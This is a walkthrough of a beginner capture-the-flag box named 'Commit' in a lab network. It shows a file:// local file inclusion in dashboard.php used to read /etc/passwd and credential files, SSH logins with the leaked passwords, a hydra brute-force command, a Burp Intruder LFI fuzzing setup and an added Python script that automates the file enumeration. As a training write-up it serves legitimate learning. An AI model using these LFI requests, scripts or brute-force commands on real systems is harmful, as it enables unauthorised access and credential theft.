QQ group: Commit box walkthrough

Commit is a box built by the group owner. It mainly tests information gathering and is a good one for beginners to try~

Box link
Reference writeup

1. Basic information

Difficulty: ⭐️⭐️
Topics: information gathering, page source, HTML comments, the `file://` wrapper, `linux` basics, finding recently modified files, Burp Suite Intruder brute force with an `LFI` wordlist

2. Information gathering

Nmap

└─# arp-scan -l | grep PCS
192.168.31.94   08:00:27:12:d1:15       PCS Systemtechnik GmbH
└─# IP=192.168.31.94
└─# nmap -sV -sC -A $IP -Pn
80/tcp   open  http    Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: DevSecOps Platform v3.0
2222/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
MAC Address: 08:00:27:12:D1:15 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Ports 80 and 2222 are open

Directory scan

└─# gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://$IP -x.txt,.php,.html,.zip
└─# dirsearch -u http://$IP  -x 403 -e txt,php,html
[19:13:14] 302 -    0B  - /dashboard.php  ->  login.php
[19:13:19] 200 -  655B  - /login.php
[19:13:26] 301 -  316B  - /uploads  ->  http://192.168.31.94/uploads/
[19:13:26] 200 -  406B  - /uploads/

The scan turns up login.php, which asks for a username and password

Logging in to login.php

Look at the page first: the HTML source hides a test account, so log in directly with lingmj/lingmjnb

#view-source:http://192.168.31.94/
<!-- Test Account: lingmj / lingmjnb -->

After logging in there is a jpg upload and a ping function. After a lot of testing neither an upload filter bypass nor command injection worked, so back to information gathering

#view-source:http://192.168.31.94/dashboard.php
<!--
$file = $_GET['file'] ?? '';
if (strpos($file, 'file://') === 0) {
    readfile($file);
}

The source leaks again. The value of the `file` GET parameter is read, and the only check is whether it starts with `file://`. If it does, the string goes straight into `readfile()`, which honours the `file://` stream wrapper. There is no path restriction, so any file the web server user can read can be fetched just by pointing the `file://` scheme at it.

file:// wrapper test
#http://192.168.31.94/dashboard.php?file=file:///etc/passwd
root:x:0:0:root:/root:/bin/bash
.....
welcome:x:1000:1000:,,,:/home/welcome:/bin/bash
lingmj:x:1001:1001:,,,:/home/lingmj:/bin/bash
#http://192.168.31.94/dashboard.php?file=file:///home/lingmj/.bash_history
git init
vi .git/config
#http://192.168.31.94/dashboard.php?file=file:///home/lingmj/.git/config
 #lingmj:10839254acf247b9e456d713d673f9ee

Since we can read files, go through the sensitive ones one by one: /etc/passwd, /etc/hosts, /home/lingmj/.bashrc, .bash_history and so on. user.txt cannot be read directly this way.


/home/lingmj/.bash_history gives the command history, which shows /home/lingmj/.git/config was edited; take a look at what leaks there

Getting a shell as lingmj

/home/lingmj/.bash_history leaked the command history, and the /home/lingmj/.git/config it points at hides a credential

└─# ssh lingmj@$IP -p 2222
 #lingmj:10839254acf247b9e456d713d673f9ee
#a bit of housekeeping once on the box
mkdir ~/.ssh
echo 'ssh-rsa'>~/.ssh/authorized_keys    #replace 'ssh-rsa' with your own public key
alias ll='ls -artl'
echo "alias ll='ls -artl'" >> ~/.bashrc
source ~/.bashrc

/home/lingmj/.git/config contains the SSH password

#lingmj:10839254acf247b9e456d713d673f9ee

Grab user.txt
lingmj@Commit:~$ id
uid=1001(lingmj) gid=1001(lingmj) groups=1001(lingmj)
lingmj@Commit:~$ cat user.txt

Getting welcome

No other files belonging to welcome turned up, so try linpeas.sh

lingmj@Commit:~$ wget 192.168.31.126/linpeas.sh
lingmj@Commit:~$ chmod +x linpeas.sh
lingmj@Commit:~$ ./linpeas.sh
lingmj@Commit:~$ dpkg -V

linpeas.sh finds nothing of value, so look for files related to welcome

#recursively search from / for regular files owned by welcome
find / -user welcome -type f 2>/dev/null
#-user welcome: owner is welcome
#-type f: regular files only (no directories)
#files whose name contains "welcome"
find / -type f -name "*welcome*" 2>/dev/null
#recursively search /home for files containing the text "welcome"
grep -rl "welcome" /home 2>/dev/null

After a long search it turns out the content of user.txt is welcome's password

lingmj@Commit:~$ cat user.txt
flag{user-3d442179fc3b320d70689ebb7cb764af}
lingmj@Commit:~$ su - welcome
Password:#3d442179fc3b320d70689ebb7cb764af
welcome@Commit:~$ id
uid=1000(welcome) gid=1000(welcome) groups=1000(welcome)
welcome@Commit:~$ ls -artl
total 24
-rw-r--r-- 1 welcome welcome  807 Apr 11 22:27 .profile
-rw-r--r-- 1 welcome welcome 3526 Apr 11 22:27 .bashrc
-rw-r--r-- 1 welcome welcome  220 Apr 11 22:27 .bash_logout
drwxr-xr-x 4 root    root    4096 May 17 10:19 ..
-rw-r--r-- 1 root    root      44 May 17 10:27 user.txt
lrwxrwxrwx 1 root    root       9 May 17 10:38 .bash_history -> /dev/null
drwx------ 2 welcome welcome 4096 May 17 10:38 .
welcome@Commit:~$ cat user.txt
flag{user-3d442179fc3b320d70689ebb7cb764af}
welcome@Commit:~$ pwd
/home/welcome

welcome's password: 3d442179fc3b320d70689ebb7cb764af

Only after reading the group owner's writeup did I realise that if you dig carefully you can find the modification records of passwd and shadow: the backup passwd- still holds welcome's password. Getting welcome does not actually matter on this box, because once you are on it you should be asking why SSH is on port 2222 and go look at what was changed in the config file

lingmj@Commit:/etc$ ls -l | grep passwd
-rw-r--r-- 1 root root    1440 May 17 10:20 passwd
-rw-r--r-- 1 root root    1466 May 17 10:27 passwd-
lingmj@Commit:/etc$ ls -l | grep shadow
-rw-r----- 1 root shadow   588 May 17 10:19 gshadow
-rw-r----- 1 root shadow   577 Apr 11 22:27 gshadow-
-rw-r----- 1 root shadow  1075 May 18 08:33 shadow
-rw-r----- 1 root shadow   942 Apr 11 22:27 shadow-
lingmj@Commit:/etc$ diff passwd passwd-
26,27c26,27
< welcome:x:1000:1000:,,,:/home/welcome:/bin/bash
< lingmj:x:1001:1001:,,,:/home/lingmj:/bin/bash
---
> welcome:x:1000:1000:3d442179fc3b320d70689ebb7cb764af:/home/welcome:/bin/bash
> lingmj:x:1001:1001::/home/lingmj:/bin/bash
lingmj@Commit:~$ ls -l /etc/ssh/sshd_config
-rw-r--r-- 1 root root 3354 May 17 10:47 /etc/ssh/sshd_config
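To make the passwd/passwd- comparison repeatable, here is an added example that is not from the original writeup or the box. In the diff above, `<` lines come from passwd and `>` lines from passwd-, so welcome's GECOS was 3d442179fc3b320d70689ebb7cb764af in the backup and `,,,` afterwards. The script parses both files, reports every field that differs per user, and flags overwritten GECOS values that look like a hex token. The two sample contents are constructed from that diff (only root, welcome and lingmj kept); on the target you would read the real files, which any user can do because passwd- is 0644.

```python
"""Field-by-field comparison of /etc/passwd with its backup /etc/passwd-.

Added example, not from the original writeup. The sample files below are
constructed from the diff in the writeup. The shadow-utils tools (useradd,
usermod, vipw, ...) leave the previous copy behind as passwd-, so a GECOS
field that was later blanked is still readable there.
"""
import re

FIELDS = ("name", "password", "uid", "gid", "gecos", "home", "shell")

# constructed sample: current /etc/passwd ('<' lines of the diff)
CURRENT_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
welcome:x:1000:1000:,,,:/home/welcome:/bin/bash
lingmj:x:1001:1001:,,,:/home/lingmj:/bin/bash
"""

# constructed sample: backup /etc/passwd- ('>' lines of the diff)
BACKUP_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
welcome:x:1000:1000:3d442179fc3b320d70689ebb7cb764af:/home/welcome:/bin/bash
lingmj:x:1001:1001::/home/lingmj:/bin/bash
"""


def parse_passwd(text: str) -> dict:
    """Map user name -> dict of the seven passwd fields; malformed lines are skipped."""
    users = {}
    for line in text.splitlines():
        parts = line.split(":")
        if len(parts) != len(FIELDS) or not parts[0]:
            continue
        users[parts[0]] = dict(zip(FIELDS, parts))
    return users


def passwd_changes(current_text: str, backup_text: str) -> dict:
    """Return {user: {field: (backup_value, current_value)}} for fields that differ.
    A user present in only one file is reported under the pseudo-field 'present'."""
    current, backup = parse_passwd(current_text), parse_passwd(backup_text)
    changes = {}
    for name in sorted(set(current) | set(backup)):
        if name not in current or name not in backup:
            changes[name] = {"present": (name in backup, name in current)}
            continue
        diff = {f: (backup[name][f], current[name][f])
                for f in FIELDS if backup[name][f] != current[name][f]}
        if diff:
            changes[name] = diff
    return changes


# a run of 32+ hex digits, i.e. at least the length of an MD5 hex digest
SECRET_RE = re.compile(r"[0-9a-fA-F]{32,}")


def leaked_gecos(changes: dict) -> list:
    """(user, old_gecos) for GECOS values that were overwritten and look like a
    token rather than the usual 'Full Name,Room,Work,Home' text."""
    found = []
    for name, diff in changes.items():
        old, new = diff.get("gecos", ("", ""))
        if old != new and SECRET_RE.fullmatch(old):
            found.append((name, old))
    return found


if __name__ == "__main__":
    changes = passwd_changes(CURRENT_PASSWD, BACKUP_PASSWD)
    for user, diff in changes.items():
        print(user, diff)
    print("candidates:", leaked_gecos(changes))
```

On a real box pass `open("/etc/passwd").read()` and `open("/etc/passwd-").read()` instead of the samples. The same comparison applies to shadow-/gshadow- when they are readable, which here they are not (root:shadow, 0640), and to group/group-.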

Getting root

No sudo

welcome@Commit:~$ sudo  -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for welcome:
Sorry, user welcome may not run sudo on Commit.

Dig through the files again; in fact SSH listening on 2222 was already a hint to look at sshd_config

lingmj@Commit:~$ cat /etc/ssh/sshd_config | grep -E 'root|Root'
# all root login
#PermitRootLogin yes
PermitRootLogin no
# test admin/pass root/root123.
# the setting of "PermitRootLogin without-password".
#ChrootDirectory none
###grep -i ignores case, so the command simplifies to grep -i root /etc/ssh/sshd_config

Sure enough, sshd_config contains the root password root123.

Grab root.txt
welcome@Commit:~$ su
Password:
root@Commit:/home/welcome# id
uid=0(root) gid=0(root) groups=0(root)
root@Commit:/home/welcome# cd
root@Commit:~# ls
root.txt
root@Commit:~# cat root.txt

Leaving a hydra command with a custom port for reference, but don't count on brute-forcing SSH: the passwords are not in rockyou.txt, and root login over SSH is disabled anyway (PermitRootLogin no)

└─# hydra -l root  -P /usr/share/wordlists/rockyou.txt ssh://$IP  -s 2222 -V -I -u -f
└─# cat -n /usr/share/wordlists/rockyou.txt | grep root123.
1334411 root123456
4171835 root123west171
4171836 root1234
#the trailing '.' is a regex wildcard here, which is why the three lines above match; grep -F 'root123.' looks for the literal string and returns no line

The whole box is information gathering; read the brief carefully: difficulty easy! O(∩_∩)O~

Appendix: finding recently modified files
lingmj@Commit:~$ find / -newer /etc/passwd 2>/dev/null | grep -Pv 'sys|proc|var|run|share|dev|tmp|git'
/root
/usr/bin
/usr/local/bin
/usr/lib
/home/welcome
/home/lingmj
/home/lingmj/.bashrc
/home/lingmj/.bash_history
/home/lingmj/.ssh
/home/lingmj/.ssh/authorized_keys
/home/lingmj/.gnupg
/home/lingmj/.gnupg/trustdb.gpg
/home/lingmj/.gnupg/pubring.kbx
/home/lingmj/.gnupg/private-keys-v1.d
/home/lingmj/user.txt
/etc
/etc/sudoers
/etc/bash_completion.d
/etc/ssh
/etc/ssh/sshd_config
/etc/hosts
/etc/passwd-
/etc/shadow
/etc/hostname
/etc/resolv.conf
Appendix: brute-forcing with Burp Intruder and an LFI wordlist

Wordlist used for fuzzing

└─# ls -l /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt
-rwxrwxrwx 1 root root 22883 Nov 20 18:38 /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt

Where to place the Intruder payload position

GET /dashboard.php?file=file://§/etc/passwd§ HTTP/1.1
Host: 192.168.31.94
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=n0540ni7ggj6o3mjcrnftk1hrj
Connection: close


Sort the results by response length, then open the responses to see which files came back with content and which have been changed
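The same wordlist triage can be scripted instead of clicked through in Intruder. The following is an added example, not code from the original writeup or the box. It assumes the dashboard.php logic quoted earlier (readfile() on a `file` parameter that begins with file://), a valid PHPSESSID from the logged-in session (the cookie value below is a placeholder), and a wordlist of absolute paths such as the one listed above. It requests each path and keeps those whose response length differs from a "no such file" probe, which is what sorting the Intruder results by length does by hand; it also covers the "read the sensitive files one by one" step from the lingmj section.

```python
"""Enumerate readable files through the file:// wrapper in dashboard.php.

Added example, not code from the original writeup or the box. Assumes
dashboard.php passes GET ?file=file://<path> to readfile() when the value
starts with file://, and a logged-in PHPSESSID. SESSION and the wordlist
path are placeholders to replace.
"""
import sys
import urllib.parse
import urllib.request

BASE_URL = "http://192.168.31.94"                    # target from the scan above
SESSION = "PHPSESSID=replace-with-your-session-id"   # placeholder, copy from the browser
WORDLIST = "/usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt"
PROBE = "/this/path/does/not/exist"                  # measures the 'no file' baseline


def lfi_url(path: str) -> str:
    """Build the request URL. The scheme must be the very first thing in the
    parameter (strpos(..., 'file://') === 0), and the path is percent-encoded
    so '?', '#' or '&' inside it cannot cut the query short."""
    return BASE_URL + "/dashboard.php?file=" + urllib.parse.quote("file://" + path, safe="/:")


def http_fetch(url: str) -> bytes:
    """Fetch one URL with the session cookie; without it dashboard.php redirects to login.php."""
    req = urllib.request.Request(url, headers={"Cookie": SESSION})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read()


def enumerate_files(paths, fetch=http_fetch) -> dict:
    """Request every path and keep those whose response length differs from
    the baseline (the dashboard page with nothing appended). Returns {path: body}."""
    baseline = len(fetch(lfi_url(PROBE)))
    hits = {}
    for path in paths:
        body = fetch(lfi_url(path))
        if len(body) != baseline:
            hits[path] = body
    return hits


def load_wordlist(filename: str) -> list:
    """One absolute path per line; blank lines and '#' comments are skipped."""
    with open(filename, encoding="utf-8", errors="replace") as fh:
        return [ln.strip() for ln in fh if ln.strip() and not ln.startswith("#")]


if __name__ == "__main__":
    wordlist = sys.argv[1] if len(sys.argv) > 1 else WORDLIST
    for path, body in enumerate_files(load_wordlist(wordlist)).items():
        print(f"[+] {path}  ({len(body)} bytes)")
```

Two caveats apply to the length-based triage: an empty file produces the same response as the baseline and is missed, and a file that exists but is unreadable by the web server user also looks like the baseline, so a miss is not proof that the file is absent. Run the script with the wordlist as its first argument after replacing SESSION.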
